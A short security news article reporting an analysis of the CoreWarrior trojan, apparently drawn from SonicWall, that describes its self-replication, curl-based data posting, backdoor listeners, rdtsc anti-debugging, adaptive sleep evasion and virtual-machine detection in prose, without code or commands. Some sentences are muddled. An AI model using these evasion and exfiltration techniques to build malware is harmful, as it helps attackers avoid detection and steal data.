CoreWarrior malware is spreading rapidly

CoreWarrior malware, a persistent trojan, aggressively spreads by creating numerous copies and establishing multiple backdoor connections.

It actively monitors user interactions by hooking Windows UI elements, posing a significant security threat.

The malware is a UPX-packed executable that has been modified, preventing its unpacking by standard UPX tools, which likely involves changes to the UPX header or unpacking routine, making it necessary to use specialized techniques or tools to analyze the malware’s contents.

Initial detection
Initial detection

The executable self-replicates with a random name and then uses the copy to launch a command prompt and execute a curl command to send data to a specified URL via a POST request.

The parent program efficiently implemented a process of creating and deleting copies with each successful POST, resulting in the rapid generation and disposal of one hundred and seventeen copies within a ten-minute timeframe.

Malware is connecting to the site and posting data
Malware is connecting to the site and posting data

The program, upon sending messages, establishes a listener on a range of ports. While a secondary IP address received a connection, no data was transmitted or received over either TCP or UDP.

It employs anti-debug measures by utilizing rdtsc to measure debug times and terminates the program if these times surpass a predefined threshold by establishing a hook to monitor system drive changes and gather information about available drives.

The proposed evasion technique involves implementing a randomized sleep timer that dynamically adjusts its duration based on the number of connection attempts, successes, and failures. 

Adaptive mechanisms like this one are designed to conceal the actions of attackers and make it more difficult for intrusion detection systems to identify them.

The multi-part output of data sent
The multi-part output of data sent

To identify a virtual machine environment, it is necessary to search for particular strings within the environment variables, registry entries, or kernel modules of the specific system. 

According to Sonicwall, it is possible to identify the virtual machine environment by using these strings, which are specific to HyperV containers and indicate the presence of virtualization technology.

The code potentially uses FTP, SMTP, and POP3 protocols to steal sensitive data from the system, which are commonly used for transferring files and emails and could be exploited to transmit confidential information outside the network without authorization.

The indicators of compromise (IOCs) that have been provided are most likely signatures of malware, with the first one representing a packed executable and the second one representing its unpacked counterpart. 

The packed version is obfuscated to make analysis more difficult, whereas the unpacked version is easier to read, making it easier for security researchers to recognize and analyze malicious behaviors.

Also Read:

Recent Articles

Related Stories

LEAVE A REPLY

Please enter your comment!
Please enter your name here